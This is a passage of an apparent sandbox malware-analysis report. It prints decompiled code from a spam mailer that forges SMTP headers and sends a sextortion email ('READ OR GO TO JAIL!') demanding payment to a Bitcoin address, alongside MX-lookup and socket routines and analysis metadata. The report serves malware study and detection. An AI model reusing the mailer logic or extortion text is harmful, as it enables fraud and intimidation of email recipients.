                                                                                                                                                                                                                                                                  											E00901320(__ecx, 3, __ebp - 0x628) = __ebp - 0x69c;
                                                                                                                                                                                                                                                                  											__eax = E00901320(__ecx, 5, __ebp - 0x69c);
                                                                                                                                                                                                                                                                  											__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  											__eax = wsprintfA(__ebp - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", __eax, __eax, __ebp - 0x490);
                                                                                                                                                                                                                                                                  											__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  											__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  											__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  											__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  											if(__eax != 0) {
                                                                                                                                                                                                                                                                  												__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  												__eax = wsprintfA(__ebp - 0x490, "From: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  												__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  												 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  												__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  												__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  												__eax = E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                  												if(__eax != 0) {
                                                                                                                                                                                                                                                                  													__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                  													__eax = wsprintfA(__ebp - 0x490, "To: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                  													__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  													 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  													__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  													__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  													if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  														__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  														__eax = wsprintfA(__ebp - 0x490, "Subject: %s\r\n", "READ OR GO TO JAIL!");
                                                                                                                                                                                                                                                                  														__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  														 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  														__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  														__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  														if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  															__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                  															__eax = wsprintfA(__ebp - 0x490, "Date: %s\r\n", __ebp - 0x690);
                                                                                                                                                                                                                                                                  															__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                  															 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  															__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  															__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                  															if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  																__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                  																__ecx = __ebp - 0x628;
                                                                                                                                                                                                                                                                  																E00901320(__ecx, 6, __ecx) = E00901320(__ecx, 6, __ebp - 0x69c);
                                                                                                                                                                                                                                                                  																__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                  																__eax = wsprintfA(__ebp - 0x490, "Message-ID: <%s.%s@%s>\r\n", __ebp - 0x490, __ebp - 0x490, __ebp - 0x508);
                                                                                                                                                                                                                                                                  																__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                  																 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                  																__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                  																__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																if(E00901120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                  																	__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																	if(E00901120( *(__ebp - 0x1c), "Mime-Version: 1.0\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																		if(E00901120( *(__ebp - 0x1c), "Content-type: text/plain;\r\n\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = memset(__ebp - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			strcpy(__ebp - 0x610, "Hi, I keep the whole story short.\r\n\r\n") = strcat(__ebp - 0x610, "Your device got infected with my private trojan, it gave me access to all your files, accounts and contacts.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "Check the sender of this email, I sent it from your email account.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "It won\'t take a long time to send your data with the proof of your activities to the police.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "My address is: bc1qfzlmekudmjnhj88yjl8277zkzu6v9c2r890fan\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			__ebp - 0x610 = strcat(__ebp - 0x610, "Once I get the payment, I will remove everything, be sure, I keep my promises.\r\n\r\n");
                                                                                                                                                                                                                                                                  																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                  																			strcat(__ebp - 0x610, "Next time keep your device updated with the newest security patches.\r\n.\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  																			if(E00901120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                  																				 *(__ebp - 0x20) = 7;
                                                                                                                                                                                                                                                                  																			} else {
                                                                                                                                                                                                                                                                  																				 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																			}
                                                                                                                                                                                                                                                                  																		} else {
                                                                                                                                                                                                                                                                  																			 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																		}
                                                                                                                                                                                                                                                                  																	} else {
                                                                                                                                                                                                                                                                  																		 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																	}
                                                                                                                                                                                                                                                                  																} else {
                                                                                                                                                                                                                                                                  																	 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  																}
                                                                                                                                                                                                                                                                  															} else {
                                                                                                                                                                                                                                                                  																 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  															}
                                                                                                                                                                                                                                                                  														} else {
                                                                                                                                                                                                                                                                  															 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  														}
                                                                                                                                                                                                                                                                  													} else {
                                                                                                                                                                                                                                                                  														 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  													}
                                                                                                                                                                                                                                                                  												} else {
                                                                                                                                                                                                                                                                  													 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										} else {
                                                                                                                                                                                                                                                                  											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									case 6:
                                                                                                                                                                                                                                                                  										L45:
                                                                                                                                                                                                                                                                  										__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                  										__eax = E00901120( *(__ebp - 0x1c), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                  										 *(__ebp - 0x20) = 8;
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L47:
                                                                                                                                                                                                                                                                  					 *(_t190 - 8) = 0 |  *(_t190 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                  					__imp__#22( *((intOrPtr*)(_t190 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                  					__imp__#3( *((intOrPtr*)(_t190 - 0x1c)));
                                                                                                                                                                                                                                                                  					return  *(_t190 - 8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x00901bb6
                                                                                                                                                                                                                                                                  0x00901bb6
                                                                                                                                                                                                                                                                  0x00901bb6
                                                                                                                                                                                                                                                                  0x00901bc6
                                                                                                                                                                                                                                                                  0x00901beb
                                                                                                                                                                                                                                                                  0x00901c03
                                                                                                                                                                                                                                                                  0x00901c08
                                                                                                                                                                                                                                                                  0x00901c0d
                                                                                                                                                                                                                                                                  0x00901c1b
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00901c0f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00902159
                                                                                                                                                                                                                                                                  0x00901ab4
                                                                                                                                                                                                                                                                  0x00901ab9
                                                                                                                                                                                                                                                                  0x00901abc
                                                                                                                                                                                                                                                                  0x00901ac9
                                                                                                                                                                                                                                                                  0x00901ad0
                                                                                                                                                                                                                                                                  0x00901ad6
                                                                                                                                                                                                                                                                  0x00901ae5
                                                                                                                                                                                                                                                                  0x00901aea
                                                                                                                                                                                                                                                                  0x00901aef
                                                                                                                                                                                                                                                                  0x00901af6
                                                                                                                                                                                                                                                                  0x00901af9
                                                                                                                                                                                                                                                                  0x00901b08
                                                                                                                                                                                                                                                                  0x00901b15
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901b1b
                                                                                                                                                                                                                                                                  0x00901b21
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901b28
                                                                                                                                                                                                                                                                  0x00901b28
                                                                                                                                                                                                                                                                  0x00901b3c
                                                                                                                                                                                                                                                                  0x00901b71
                                                                                                                                                                                                                                                                  0x00901b77
                                                                                                                                                                                                                                                                  0x00901b7a
                                                                                                                                                                                                                                                                  0x00901b3e
                                                                                                                                                                                                                                                                  0x00901b4f
                                                                                                                                                                                                                                                                  0x00901b55
                                                                                                                                                                                                                                                                  0x00901b58
                                                                                                                                                                                                                                                                  0x00901b58
                                                                                                                                                                                                                                                                  0x00901b92
                                                                                                                                                                                                                                                                  0x00901b97
                                                                                                                                                                                                                                                                  0x00901b9c
                                                                                                                                                                                                                                                                  0x00901baa
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00901b9e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901c27
                                                                                                                                                                                                                                                                  0x00901c27
                                                                                                                                                                                                                                                                  0x00901c37
                                                                                                                                                                                                                                                                  0x00901c3d
                                                                                                                                                                                                                                                                  0x00901c40
                                                                                                                                                                                                                                                                  0x00901c46
                                                                                                                                                                                                                                                                  0x00901c4d
                                                                                                                                                                                                                                                                  0x00901c58
                                                                                                                                                                                                                                                                  0x00901c62
                                                                                                                                                                                                                                                                  0x00901c70
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00901c64
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901c7c
                                                                                                                                                                                                                                                                  0x00901c83
                                                                                                                                                                                                                                                                  0x00901c87
                                                                                                                                                                                                                                                                  0x00901c91
                                                                                                                                                                                                                                                                  0x00901c9f
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00901c93
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901cab
                                                                                                                                                                                                                                                                  0x00901cab
                                                                                                                                                                                                                                                                  0x00901cc9
                                                                                                                                                                                                                                                                  0x00901ccf
                                                                                                                                                                                                                                                                  0x00901cdd
                                                                                                                                                                                                                                                                  0x00901cea
                                                                                                                                                                                                                                                                  0x00901cf2
                                                                                                                                                                                                                                                                  0x00901cfb
                                                                                                                                                                                                                                                                  0x00901d0a
                                                                                                                                                                                                                                                                  0x00901d11
                                                                                                                                                                                                                                                                  0x00901d16
                                                                                                                                                                                                                                                                  0x00901d17
                                                                                                                                                                                                                                                                  0x00901d1c
                                                                                                                                                                                                                                                                  0x00901d1c
                                                                                                                                                                                                                                                                  0x00901d22
                                                                                                                                                                                                                                                                  0x00901d27
                                                                                                                                                                                                                                                                  0x00901d28
                                                                                                                                                                                                                                                                  0x00901d2d
                                                                                                                                                                                                                                                                  0x00901d2d
                                                                                                                                                                                                                                                                  0x00901d33
                                                                                                                                                                                                                                                                  0x00901d38
                                                                                                                                                                                                                                                                  0x00901d39
                                                                                                                                                                                                                                                                  0x00901d3e
                                                                                                                                                                                                                                                                  0x00901d3e
                                                                                                                                                                                                                                                                  0x00901d44
                                                                                                                                                                                                                                                                  0x00901d49
                                                                                                                                                                                                                                                                  0x00901d4a
                                                                                                                                                                                                                                                                  0x00901d4f
                                                                                                                                                                                                                                                                  0x00901d6c
                                                                                                                                                                                                                                                                  0x00901d73
                                                                                                                                                                                                                                                                  0x00901d79
                                                                                                                                                                                                                                                                  0x00901d7c
                                                                                                                                                                                                                                                                  0x00901d82
                                                                                                                                                                                                                                                                  0x00901d90
                                                                                                                                                                                                                                                                  0x00901d94
                                                                                                                                                                                                                                                                  0x00901d9e
                                                                                                                                                                                                                                                                  0x00901dac
                                                                                                                                                                                                                                                                  0x00901dc5
                                                                                                                                                                                                                                                                  0x00901dce
                                                                                                                                                                                                                                                                  0x00901ddc
                                                                                                                                                                                                                                                                  0x00901de3
                                                                                                                                                                                                                                                                  0x00901de9
                                                                                                                                                                                                                                                                  0x00901dec
                                                                                                                                                                                                                                                                  0x00901df9
                                                                                                                                                                                                                                                                  0x00901e00
                                                                                                                                                                                                                                                                  0x00901e04
                                                                                                                                                                                                                                                                  0x00901e0e
                                                                                                                                                                                                                                                                  0x00901e25
                                                                                                                                                                                                                                                                  0x00901e2c
                                                                                                                                                                                                                                                                  0x00901e32
                                                                                                                                                                                                                                                                  0x00901e35
                                                                                                                                                                                                                                                                  0x00901e3b
                                                                                                                                                                                                                                                                  0x00901e49
                                                                                                                                                                                                                                                                  0x00901e4d
                                                                                                                                                                                                                                                                  0x00901e57
                                                                                                                                                                                                                                                                  0x00901e65
                                                                                                                                                                                                                                                                  0x00901e75
                                                                                                                                                                                                                                                                  0x00901e7b
                                                                                                                                                                                                                                                                  0x00901e7e
                                                                                                                                                                                                                                                                  0x00901e84
                                                                                                                                                                                                                                                                  0x00901e8b
                                                                                                                                                                                                                                                                  0x00901ea0
                                                                                                                                                                                                                                                                  0x00901eb8
                                                                                                                                                                                                                                                                  0x00901ebf
                                                                                                                                                                                                                                                                  0x00901ec5
                                                                                                                                                                                                                                                                  0x00901ec8
                                                                                                                                                                                                                                                                  0x00901ece
                                                                                                                                                                                                                                                                  0x00901edc
                                                                                                                                                                                                                                                                  0x00901eea
                                                                                                                                                                                                                                                                  0x00901ef8
                                                                                                                                                                                                                                                                  0x00901f0b
                                                                                                                                                                                                                                                                  0x00901f11
                                                                                                                                                                                                                                                                  0x00901f14
                                                                                                                                                                                                                                                                  0x00901f1a
                                                                                                                                                                                                                                                                  0x00901f21
                                                                                                                                                                                                                                                                  0x00901f36
                                                                                                                                                                                                                                                                  0x00901f44
                                                                                                                                                                                                                                                                  0x00901f4b
                                                                                                                                                                                                                                                                  0x00901f66
                                                                                                                                                                                                                                                                  0x00901f74
                                                                                                                                                                                                                                                                  0x00901f7b
                                                                                                                                                                                                                                                                  0x00901f81
                                                                                                                                                                                                                                                                  0x00901f84
                                                                                                                                                                                                                                                                  0x00901f8a
                                                                                                                                                                                                                                                                  0x00901f98
                                                                                                                                                                                                                                                                  0x00901fa6
                                                                                                                                                                                                                                                                  0x00901fbb
                                                                                                                                                                                                                                                                  0x00901fc9
                                                                                                                                                                                                                                                                  0x00901fec
                                                                                                                                                                                                                                                                  0x00902008
                                                                                                                                                                                                                                                                  0x00902015
                                                                                                                                                                                                                                                                  0x00902030
                                                                                                                                                                                                                                                                  0x00902044
                                                                                                                                                                                                                                                                  0x00902051
                                                                                                                                                                                                                                                                  0x00902080
                                                                                                                                                                                                                                                                  0x0090208d
                                                                                                                                                                                                                                                                  0x009020bc
                                                                                                                                                                                                                                                                  0x009020c9
                                                                                                                                                                                                                                                                  0x009020f8
                                                                                                                                                                                                                                                                  0x00902105
                                                                                                                                                                                                                                                                  0x0090211d
                                                                                                                                                                                                                                                                  0x0090212b
                                                                                                                                                                                                                                                                  0x00902136
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x0090212d
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fee
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fcb
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901fa8
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901f38
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901eec
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901ea2
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e59
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901e10
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00901da0
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0090213f
                                                                                                                                                                                                                                                                  0x00902146
                                                                                                                                                                                                                                                                  0x0090214a
                                                                                                                                                                                                                                                                  0x00902152
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901af1
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901acb
                                                                                                                                                                                                                                                                  0x00901ac9
                                                                                                                                                                                                                                                                  0x0090215e
                                                                                                                                                                                                                                                                  0x00902167
                                                                                                                                                                                                                                                                  0x00902170
                                                                                                                                                                                                                                                                  0x0090217a
                                                                                                                                                                                                                                                                  0x00902186
                                                                                                                                                                                                                                                                  0x00902186

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00901BC6
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00901BE2
                                                                                                                                                                                                                                                                    • Part of subcall function 00901120: lstrlenA.KERNEL32(?), ref: 0090112D
                                                                                                                                                                                                                                                                    • Part of subcall function 00901120: send.WS2_32(?,?,000000FF,00000000), ref: 00901144
                                                                                                                                                                                                                                                                  • shutdown.WS2_32(000000FF,00000002), ref: 00902170
                                                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 0090217A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wsprintf$closesocketlstrlensendshutdown
                                                                                                                                                                                                                                                                  • String ID: <%s>$MAIL FROM: %s
                                                                                                                                                                                                                                                                  • API String ID: 1146405-791590210
                                                                                                                                                                                                                                                                  • Opcode ID: dda1365833e20736cde87998c0f8e4ccc86a051c1c43a4dcbfb2813f88b70e52
                                                                                                                                                                                                                                                                  • Instruction ID: 5b84d7224e0053e6c7d2aa5d33c05b9f940f68241b06c94e2a634caad13bc2d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dda1365833e20736cde87998c0f8e4ccc86a051c1c43a4dcbfb2813f88b70e52
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3214FB1D04228DFCF54CB94DC49BEEB7B8BF48304F008599F60AA6280D7795A95CF65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 257 901760-90178a DnsQuery_A 258 90178c-9017a4 call 9016e0 257->258 259 9017bf-9017ca DnsFree 257->259 258->259 263 9017a6-9017bd DnsFree closesocket 258->263 261 9017cc-9017cf 259->261 263->261
                                                                                                                                                                                                                                                                  C-Code - Quality: 31%
                                                                                                                                                                                                                                                                  			E00901760() {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				char* _t12;
                                                                                                                                                                                                                                                                  				intOrPtr _t14;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_push(0);
                                                                                                                                                                                                                                                                  				_t12 =  &_v8;
                                                                                                                                                                                                                                                                  				_push(_t12);
                                                                                                                                                                                                                                                                  				_push(0);
                                                                                                                                                                                                                                                                  				_push(0);
                                                                                                                                                                                                                                                                  				_push(0xf);
                                                                                                                                                                                                                                                                  				_push("yahoo.com"); // executed
                                                                                                                                                                                                                                                                  				L0090295E(); // executed
                                                                                                                                                                                                                                                                  				_v12 = _t12;
                                                                                                                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                                                                                                                  					L3:
                                                                                                                                                                                                                                                                  					_push(1);
                                                                                                                                                                                                                                                                  					_push(_v8);
                                                                                                                                                                                                                                                                  					L00902958();
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t14 = E009016E0( *((intOrPtr*)(_v8 + 0x18)), 0x19); // executed
                                                                                                                                                                                                                                                                  				_v16 = _t14;
                                                                                                                                                                                                                                                                  				if(_v16 <= 0) {
                                                                                                                                                                                                                                                                  					goto L3;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L00902958();
                                                                                                                                                                                                                                                                  				__imp__#3(_v16, _v8, 1); // executed
                                                                                                                                                                                                                                                                  				return 1;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x00901766
                                                                                                                                                                                                                                                                  0x0090176d
                                                                                                                                                                                                                                                                  0x0090176f
                                                                                                                                                                                                                                                                  0x00901772
                                                                                                                                                                                                                                                                  0x00901773
                                                                                                                                                                                                                                                                  0x00901775
                                                                                                                                                                                                                                                                  0x00901777
                                                                                                                                                                                                                                                                  0x00901779
                                                                                                                                                                                                                                                                  0x0090177e
                                                                                                                                                                                                                                                                  0x00901783
                                                                                                                                                                                                                                                                  0x0090178a
                                                                                                                                                                                                                                                                  0x009017bf
                                                                                                                                                                                                                                                                  0x009017bf
                                                                                                                                                                                                                                                                  0x009017c4
                                                                                                                                                                                                                                                                  0x009017c5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x009017ca
                                                                                                                                                                                                                                                                  0x00901795
                                                                                                                                                                                                                                                                  0x0090179d
                                                                                                                                                                                                                                                                  0x009017a4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x009017ac
                                                                                                                                                                                                                                                                  0x009017b5
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DnsQuery_A.DNSAPI(yahoo.com,0000000F,00000000,00000000,00000000,00000000), ref: 0090177E
                                                                                                                                                                                                                                                                  • DnsFree.DNSAPI(00000000,00000001), ref: 009017AC
                                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 009017B5
                                                                                                                                                                                                                                                                  • DnsFree.DNSAPI(00000000,00000001), ref: 009017C5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Free$Query_closesocket
                                                                                                                                                                                                                                                                  • String ID: yahoo.com
                                                                                                                                                                                                                                                                  • API String ID: 1946217314-667638125
                                                                                                                                                                                                                                                                  • Opcode ID: 2d10cf3fe98b7304fdf596743f2b49d109d25344893240f7e311dd7beffb147b
                                                                                                                                                                                                                                                                  • Instruction ID: 0a07f781c905813ac5c67059a9dea32528e8a4386f1f9938d8861997ca1a3e44
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d10cf3fe98b7304fdf596743f2b49d109d25344893240f7e311dd7beffb147b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA013675E40308FFDB10EBE0CD86B9D77799B44704F208194F5146B2C1D6B59B459B50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 264 9019e0-901a05 call 9021b0 267 902180-902186 264->267 268 901a0b-901a26 call 9010a0 264->268 268->267 271 901a2c-901a3f socket 268->271 271->267 272 901a45-901a49 271->272 272->267 273 901a4f-901a62 connect 272->273 274 901a68-901a89 setsockopt 273->274 275 90216a-90217a shutdown closesocket 273->275 276 901a90-901a94 274->276 275->267 277 901a9a-901a9e 276->277 278 90215e-902167 276->278 277->278 279 901aa4-901ab4 call 901160 277->279 278->275 281 901ab9-901ac9 279->281 282 901ad0-901aef call 9011c0 281->282 283 901acb 281->283 286 901af1 282->286 287 901af6-901b15 282->287 283->278 286->278 288 902159 287->288 289 901b1b 287->289 288->276 289->288
                                                                                                                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                                                                                                                  			E009019E0(int _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
